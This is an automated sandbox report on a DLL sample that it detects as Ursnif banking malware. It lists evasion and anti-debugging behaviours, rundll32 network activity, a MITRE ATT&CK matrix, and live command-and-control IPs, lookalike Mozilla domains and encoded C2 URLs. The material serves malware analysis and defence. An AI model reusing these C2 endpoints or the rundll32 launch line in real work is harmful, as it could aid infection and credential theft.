      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Found evasive API chain (may stop execution after checking system information)
      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
      Source: C:\Windows\SysWOW64\rundll32.exe TID: 1676Thread sleep time: -1773297476s >= -30000sJump to behavior
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

      Anti Debugging

      barindex
      Found API chain indicative of debugger detection
      Source: C:\Windows\SysWOW64\rundll32.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00401385 LoadLibraryA,GetProcAddress,3_2_00401385
      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 170.130.165.182 80Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: trackingg-protectioon.cdn4.mozilla.net
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 80.77.23.77 80Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 80.77.25.109 80Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: protectioon.cdn4.mozilla.net
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Zeip.dll",#1Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,3_2_00401C21
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B91F55 cpuid 3_2_04B91F55
      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00402133 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,3_2_00402133
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_00401BA8 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,3_2_00401BA8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04B91F55 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_04B91F55

      Stealing of Sensitive Information

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected Ursnif
      Source: Yara matchFile source: 00000003.00000003.418603485.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418848530.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418746602.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.773492511.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418705359.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418786736.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418863496.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418642930.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000003.418675035.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5412, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts1
      Windows Management Instrumentation      		Path Interception111
      Process Injection      		12
      Virtualization/Sandbox Evasion      		1
      Input Capture      		1
      System Time Discovery      		Remote Services1
      Input Capture      		Exfiltration Over Other Network Medium2
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Data Encrypted for Impact
      Default Accounts12
      Native API      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts111
      Process Injection      		LSASS Memory111
      Security Software Discovery      		Remote Desktop Protocol11
      Archive Collected Data      		Exfiltration Over Bluetooth4
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
      Obfuscated Files or Information      		Security Account Manager12
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
      Rundll32      		NTDS1
      Process Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer13
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Software Packing      		LSA Secrets1
      Account Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
      System Owner/User Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      Remote System Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
      System Information Discovery      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Zeip.dll32%VirustotalBrowse
      Zeip.dll100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      3.2.rundll32.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
      3.2.rundll32.exe.4b90000.2.unpack100%AviraHEUR/AGEN.1245293Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.bak0%Avira URL Cloudsafe
      http://170.130.165.182/0%Avira URL Cloudsafe
      http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/fa0%Avira URL Cloudsafe
      http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q100%Avira URL Cloudmalware
      http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.bak100%Avira URL Cloudmalware
      http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.bak0%Avira URL Cloudsafe
      http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      trackingg-protectioon.cdn4.mozilla.net
      		unknown
      		unknownfalse
        		high
        protectioon.cdn4.mozilla.net
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/Fabd4fjNq/DSsjhIayoRb3vEB0gYF1/DvOBMdqirpHwq9OOdKp/l0IRYH1_2FrZtdyrRlJpVe/H42NRq5RQ81GK/VCcbxNs_/2FZJHoRNxFlaAYrUN5O5LcL/v418d_2By_/2BRt8_2Bs3hdtDQLK/oecVg251dFjL/TwR5ovb3LSr/UbFTKRYVAf_2BS/5oocK_2FZTCnj_2Bk7f5k/WVm6_2F1PqjI22z0/31vjGE0KZ/X3zQUGvA.baktrue
          • Avira URL Cloud: safe
          		unknown
          http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/q2ZxS3FX1_2FQ/CzfxjEWy/KpMrpyirWaYAf_2F58pSM7E/hql2_2Ff0P/Z_2FzTZSSRCDR8bjj/lvIYML_2BVAb/NDNuDcBuj0i/x8S9VCMsW3ok_2/BnlqZTWQkXRsJMXJ2eLuL/xrE8_2BMiM9wsQ1R/fYIgNLn5R2u2Ad3/7X_2FsIOWaCy11iw8h/jUscFfxSY/bywnHnDEPGzuSt6TUFwm/lh8gKMKhoVQ1xsZNS7s/DZZFZuGiVc6hKPbFFxnPb_/2Bv.baktrue
          • Avira URL Cloud: malware
          		unknown
          http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/faDX7AnA7p_2FL2kFpu49/EdapT6mXzLN5rW1a/SHFg4AdpPfCaQnC/CaQclcnPKuVX6yIIBl/W7EdbR3h4/Baog4bkRBbEa_2Bk3PMN/6evVCCp2n5IHM6zv9Ax/6y6Xf8N9YXabol05shGVYH/wNzbR_2FsIJoL/mKWJ5fSu/iIED2oXHSZaY9qZ9s7kS1uo/kYtbGsIEzt/S4yUXjfCecHcWUBLD/uwFDVmrla6y/oLDy.baktrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://170.130.165.182/rundll32.exe, 00000003.00000002.772970164.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://170.130.165.182/fonts/q9O3GZmMqz/vH_2FuinHCfqB7maU/gyy32Rx1oAyU/1_2B_2FdYvR/zffWIXZHaC8HuA/farundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://protectioon.cdn4.mozilla.net/fonts/zo_2F9LTFy1/2yei3vv_2FO_2B/_2FhNinG_2BU_2Bmlgeam/LapYRzVWzrundll32.exe, 00000003.00000002.772970164.0000000000B32000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            http://80.77.23.77/fonts/1c4TnFuCv/CcRXrQPe30HaMexmLpgF/4aupYBGHp_2BOME_2FG/0huvHbhao4TfaTiw3rk5b1/qrundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://80.77.25.109/fonts/WezqXaXzLUf7H3RvrWbfe/K3Y9YSHOHCe0ThXT/oS_2BzX_2FYO7OS/mLbIpFep6ip0wCkR_2/rundll32.exe, 00000003.00000002.772970164.0000000000B14000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            80.77.23.77
            		unknownGermany
            		34549MEER-ASmeerfarbigGmbHCoKGDEtrue
            80.77.25.109
            		unknownGermany
            		34549MEER-ASmeerfarbigGmbHCoKGDEtrue
            170.130.165.182
            		unknownUnited States
            		62904EONIX-COMMUNICATIONS-ASBLOCK-62904UStrue

            General Information

            Joe Sandbox Version:36.0.0 Rainbow Opal
            Analysis ID:790195
            Start date and time:2023-01-23 22:57:59 +01:00
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 8m 14s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:Zeip.dll
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:24
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winDLL@9/12@4/3
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 43.6% (good quality ratio 40.1%)
            • Quality average: 77.6%
            • Quality standard deviation: 31%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 51
            • Number of non-executed functions: 37
            Cookbook Comments:
            • Found application associated with file extension: .dll
            • Override analysis time to 240s for rundll32

            Warnings

            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, HxTsr.exe, RuntimeBroker.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
            • Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.189.173.22
            • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, cdn.onenote.net
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            22:59:02API Interceptor2x Sleep call for process: WerFault.exe modified
            22:59:10API Interceptor1x Sleep call for process: rundll32.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            170.130.165.182https://url12.mailanyone.net/scanner?m=1oXqNK-0004QR-3y&d=4%7Cmail%2F14%2F1663015200%2F1oXqNK-0004QR-3y%7Cin12g%7C57e1b682%7C20662927%7C7707187%7C631F9B6ED9B3E5F62454777326EE38A8&s=5awqXuaUaEfeIt8VQj9hJMyA2Ac&o=%2Fphtr%3A%2Fptsctive-acaeobssngci.bmoc.cGet hashmaliciousBrowse

              Domains

              No context

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              MEER-ASmeerfarbigGmbHCoKGDE111.exeGet hashmaliciousBrowse
              • 80.77.25.65
              eWASheoagJ.exeGet hashmaliciousBrowse
              • 5.1.86.195
              Cheshire_east_council_section_106_agreement (zx).jsGet hashmaliciousBrowse
              • 83.243.40.10
              https://www.consulting-werning.de/wp-includes/Requests/web22/elmarie@nelsonborman.co.zaGet hashmaliciousBrowse
              • 83.243.40.10
              G6r5jK4OD1.exeGet hashmaliciousBrowse
              • 91.151.88.159
              http://cainarchaeology.weebly.com/Get hashmaliciousBrowse
              • 185.44.104.99
              skid.x86-20220815-1256Get hashmaliciousBrowse
              • 83.243.46.34
              p-p.c-.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              i-5.8-6.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              a-r.m-7.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              m-p.s-l.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              m-i.p-s.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              a-r.m-5.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              a-r.m-6.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              s-h.4-.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              x-8.6-.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              x-3.2-.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              20993091.xlsxGet hashmaliciousBrowse
              • 45.86.220.131
              xjO2lyWgAVGet hashmaliciousBrowse
              • 45.13.237.162
              JC9Omiiy5m.exeGet hashmaliciousBrowse
              • 91.151.88.245
              MEER-ASmeerfarbigGmbHCoKGDE111.exeGet hashmaliciousBrowse
              • 80.77.25.65
              eWASheoagJ.exeGet hashmaliciousBrowse
              • 5.1.86.195
              Cheshire_east_council_section_106_agreement (zx).jsGet hashmaliciousBrowse
              • 83.243.40.10
              https://www.consulting-werning.de/wp-includes/Requests/web22/elmarie@nelsonborman.co.zaGet hashmaliciousBrowse
              • 83.243.40.10
              G6r5jK4OD1.exeGet hashmaliciousBrowse
              • 91.151.88.159
              http://cainarchaeology.weebly.com/Get hashmaliciousBrowse
              • 185.44.104.99
              skid.x86-20220815-1256Get hashmaliciousBrowse
              • 83.243.46.34
              p-p.c-.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              i-5.8-6.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              a-r.m-7.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              m-p.s-l.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              m-i.p-s.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              a-r.m-5.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              a-r.m-6.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              s-h.4-.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              x-8.6-.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              x-3.2-.ISISGet hashmaliciousBrowse
              • 91.151.89.220
              20993091.xlsxGet hashmaliciousBrowse
              • 45.86.220.131
              xjO2lyWgAVGet hashmaliciousBrowse
              • 45.13.237.162
              JC9Omiiy5m.exeGet hashmaliciousBrowse
              • 91.151.88.245

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_9fc7ea78ae4d912d22c26211888fd19455d83a_fe4ae974_06c144fc\Report.wer

              Download File
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):65536
              Entropy (8bit):0.757401484798945
              Encrypted:false
              SSDEEP:96:jmF9X5pyIy9hylKofTpXIQcQfc6vpcE46cw32+a+z+HbHgMiuuvZGxzz8sv5o5ok:SXSIHRLpS6Ijpq/u7ssS274ItW
              MD5:5EBFD76DE5EB69033EDF40A80052205D
              SHA1:DD1BE9A4697186C51CB276C49BF65A8F6C5BF7D1
              SHA-256:B2D99E1AD9CEE6573E4C2547B5DC9F23A7FDACC0168875F40DC09F064046D3B7
              SHA-512:AFD4DB13C2086BF11E08214CE9DE70C240C38FC0FB1BDBE504F2C3A44B4920B60A93C039BA3A337C7FB62EC5A8DBF7541F58CC3B6B02BFD6117122DD246DD4A1
              Malicious:false
